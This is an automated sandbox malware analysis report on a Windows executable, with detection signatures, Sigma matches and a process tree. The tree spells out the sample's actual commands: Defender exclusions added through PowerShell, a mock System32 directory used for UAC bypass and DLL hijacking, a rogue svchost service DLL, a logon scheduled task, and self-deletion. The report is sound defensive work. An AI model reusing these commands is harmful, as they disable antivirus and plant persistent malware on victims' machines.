Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
58VSNPxrI4.exe

Overview

General Information

Sample name:58VSNPxrI4.exe
renamed because original name is a hash value
Original sample name:228c09c31156d45dfe94195bb34d1399.exe
Analysis ID:1578892
MD5:228c09c31156d45dfe94195bb34d1399
SHA1:20c6ce4757be1399032b2ac6873dc505c1d02839
SHA256:b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • 58VSNPxrI4.exe (PID: 3576 cmdline: "C:\Users\user\Desktop\58VSNPxrI4.exe" MD5: 228C09C31156D45DFE94195BB34D1399)
    • cmd.exe (PID: 5372 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4464 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5964 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3020 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6064 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3032 cmdline: cmd.exe /c start "" "C:\Windows \System32\printui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • printui.exe (PID: 3580 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
        • cmd.exe (PID: 3392 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6896 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7108 cmdline: cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 7056 cmdline: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • reg.exe (PID: 6792 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • sc.exe (PID: 6856 cmdline: sc start x939048 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • cmd.exe (PID: 3380 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • console_zero.exe (PID: 6512 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 4ECCB8F5D1EDCF18A11ABED91FF85C46)
            • cmd.exe (PID: 4320 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7124 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5708 cmdline: cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3884 cmdline: timeout /t 14 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 2216 cmdline: cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7040 cmdline: timeout /t 16 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 5608 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5420 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 6848 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 7160 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3576 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5736 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4320 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3684 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7160 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5420 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3364 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • console_zero.exe (PID: 6792 cmdline: C:\Windows\System32\console_zero.exe MD5: 4ECCB8F5D1EDCF18A11ABED91FF85C46)
    • cmd.exe (PID: 6756 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5864 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: TrustedPath UAC Bypass Pattern
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: cmd.exe /c start "" "C:\Windows \System32\printui.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3032, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 3580, ProcessName: printui.exe
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\58VSNPxrI4.exe, ProcessId: 3576, TargetFilename: C:\Windows \System32\printui.dll
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 6512, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 4320, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 6512, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 4320, ProcessName: cmd.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\58VSNPxrI4.exe", ParentImage: C:\Users\user\Desktop\58VSNPxrI4.exe, ParentProcessId: 3576, ParentProcessName: 58VSNPxrI4.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 5372, ProcessName: cmd.exe
Sigma detected: Suspicious New Service Creation
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7108, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 7056, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\58VSNPxrI4.exe", ParentImage: C:\Users\user\Desktop\58VSNPxrI4.exe, ParentProcessId: 3576, ParentProcessName: 58VSNPxrI4.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 5372, ProcessName: cmd.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7108, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 7056, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5372, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 4464, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k DcomLaunch, CommandLine: C:\Windows\System32\svchost.exe -k DcomLaunch, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k DcomLaunch, ProcessId: 6848, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Windows \System32\printui.dllReversingLabs: Detection: 31%
Source: C:\Windows\System32\console_zero.exeReversingLabs: Detection: 42%
Source: C:\Windows\System32\x939048.datReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: 58VSNPxrI4.exeVirustotal: Detection: 45%Perma Link
Source: 58VSNPxrI4.exeReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.8% probability
Machine Learning detection for dropped file
Source: C:\Windows\System32\x939048.datJoe Sandbox ML: detected
Machine Learning detection for sample
Source: 58VSNPxrI4.exeJoe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB422F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,26_2_00007FFBAB422F50
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4242D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,26_2_00007FFBAB4242D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,26_2_00007FFBAB42DAA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB42ABF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB446BB0 CRYPTO_malloc,26_2_00007FFBAB446BB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,26_2_00007FFBAB462BA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB418C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,26_2_00007FFBAB418C60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB412C60 CRYPTO_zalloc,CRYPTO_free,26_2_00007FFBAB412C60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49CC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB49CC60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,26_2_00007FFBAB45AC50
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,26_2_00007FFBAB41CAB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42AAD0 CRYPTO_set_ex_data,26_2_00007FFBAB42AAD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB490AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB490AD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,26_2_00007FFBAB41CB70
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB478B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,26_2_00007FFBAB478B90
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB488B90 CRYPTO_free,CRYPTO_memdup,26_2_00007FFBAB488B90
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45AB80 CRYPTO_free,26_2_00007FFBAB45AB80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,26_2_00007FFBAB41AB80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB43CB80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,26_2_00007FFBAB47CB30
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB446B30 CRYPTO_free,CRYPTO_free,26_2_00007FFBAB446B30
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB490B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,26_2_00007FFBAB490B30
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB480B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,26_2_00007FFBAB480B20
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46EB20 CRYPTO_free,26_2_00007FFBAB46EB20
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4249F0 CRYPTO_memdup,CRYPTO_free,26_2_00007FFBAB4249F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4969E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,26_2_00007FFBAB4969E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB43C9A0
